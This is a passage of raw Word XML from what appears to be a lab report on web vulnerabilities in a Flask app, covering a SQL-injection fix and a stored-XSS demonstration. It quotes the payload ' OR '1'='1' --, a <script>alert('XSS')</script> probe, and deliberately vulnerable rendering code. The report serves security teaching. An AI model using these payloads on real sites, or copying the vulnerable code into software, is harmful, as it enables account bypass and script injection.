                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Parameterized query: ? placeholders, values passed separately</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="361A9B85" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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c.execute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35CD0ACB" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            'SELECT * FROM users WHERE username = ? AND password = ?',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1623E08B" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            (username, password)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="796A0351" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="730E3DEC" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        user = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>c.fetchone</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="046A7E8C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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conn.close</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0485856C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        if user:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="115C3B6E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            message = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>f'Welcome</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, {user[1]}!'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A60B179" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A851F84" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            message = 'Login failed.'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3016B30B" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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render_template_string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>('''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DF674A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        &lt;h2&gt;Login&lt;/h2&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="228A67DD" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        &lt;form method="POST"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32BF4501" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            Username: &lt;input name="username"&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EC70849" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            Password: &lt;input name="password"&gt;&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>br</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6495B8F3" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">            &lt;input type="submit" value="Login"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EE539C9" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        &lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE6C95C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        &lt;p&gt;{{ message }}&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C79322" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    ''', message=message)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B3D7B4F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B083BB" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Testing confirmed that valid credentials (admin / secret123) still result in a successful login, while the injection payload ' OR '1'='1' -- now returns "Login failed." because it is treated as a literal username string, not SQL logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA6456" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10140" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="55" w:type="dxa"/>
          <w:left w:w="55" w:type="dxa"/>
          <w:bottom w:w="55" w:type="dxa"/>
          <w:right w:w="55" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10140"/>
      </w:tblGrid>
      <w:tr w:rsidR="00892D2F" w14:paraId="0B9E42A5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="4770"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10140" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="2A6099"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="2A6099"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2A6099"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="2A6099"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4FA83B6A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="7" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1CB4584E" wp14:editId="4DAC6268">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>3185160</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>33020</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3156585" cy="2689225"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="largest"/>
                  <wp:docPr id="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pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3156585" cy="2689225"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="8" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="694800DA" wp14:editId="0A559991">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>50165</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>73660</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3088005" cy="2680335"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="largest"/>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8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3088005" cy="2680335"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="03FC3B3C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E792B95" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0989FB94" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D850767" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4379BB75" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30194475" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="546404E2" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1C1C3DC7" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="027AAF72" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37A96C13" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="79A3EF91" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="212A7647" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75084B25" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5A37C3F9" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28661920" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FDEA927" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C0C36C7" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="516F58F5" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B47E81" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2265E9FD" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 2: Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE618F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A816BD7" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 – Stored XSS: Basic Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212D61E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following payload was entered into the comment </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the /comments page and submitted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD33E2" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="2F86D7BD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2AAC5007" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="630F342A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59512C89" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A267896" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50ECCCC9" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="300" w:type="dxa"/>
          <w:left w:w="200" w:type="dxa"/>
          <w:bottom w:w="300" w:type="dxa"/>
          <w:right w:w="200" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00892D2F" w14:paraId="6CF3B8A4"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7F7"/>
          </w:tcPr>
          <w:p w14:paraId="27792100" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="4" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="10F11882" wp14:editId="0C45FBFC">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5689600" cy="319849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9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5689600" cy="3198495"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CFF5BE5" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7544D2" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Why the Script Executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE03F4" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability exists because of two compounding issues in the comments route:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A956A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The comment is stored directly in the database without any sanitisation or encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7452BB07" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>When rendering comments, the template uses the |safe Jinja2 filter, which explicitly disables Flask's automatic HTML escaping. The raw HTML string — including the &lt;script&gt; tag — is injected into the page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDEC3D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="1A7F6E01" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="70BC9AD4" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># VULNERABLE: string concatenation + |safe filter</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E8C997A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>comments_html</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = ''.join(f'&lt;li&gt;{row[0]}&lt;/li&gt;' for row in rows)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42E8845C" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F"/>
          <w:p w14:paraId="6D2A893F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
